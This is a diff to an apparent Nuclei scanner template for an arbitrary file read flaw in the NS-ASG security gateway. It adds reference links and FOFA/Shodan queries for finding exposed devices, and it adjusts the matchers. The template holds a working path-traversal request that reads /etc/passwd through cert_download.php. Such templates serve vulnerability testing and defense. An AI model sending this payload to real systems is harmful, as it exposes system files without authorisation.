--- a/vulnerabilities/other/ns-asg-file-read.yaml
+++ b/vulnerabilities/other/ns-asg-file-read.yaml
@@ -4,7 +4,12 @@ info:
   name: NS ASG Arbitrary File Read
   author: pikpikcu, ritikchaddha
   severity: high
-  reference: https://zhuanlan.zhihu.com/p/368054963
+  reference:
+    - https://zhuanlan.zhihu.com/p/368054963
+    - http://wiki.xypbk.com/Web安全/网康%20NS-ASG安全网关/网康%20NS-ASG安全网关%20任意文件读取漏洞.md
+  metadata:
+    fofa-query: app="网康科技-NS-ASG安全网关"
+    shodan-query: http.title:“NS-ASG”
   tags: nsasg,lfi
 
 requests:
@@ -13,9 +18,9 @@ requests:
       - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd"
       - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php"
 
-    matchers-condition: and
+    stop-at-first-match: true
+    matchers-condition: or
     matchers:
-
       - type: regex
         regex:
           - "root:.*:0:0:"
@@ -25,7 +30,4 @@ requests:
         words:
           - "$certfile"
           - "application/pdf"
-
-      - type: status
-        status:
-          - 200
+        condition: and
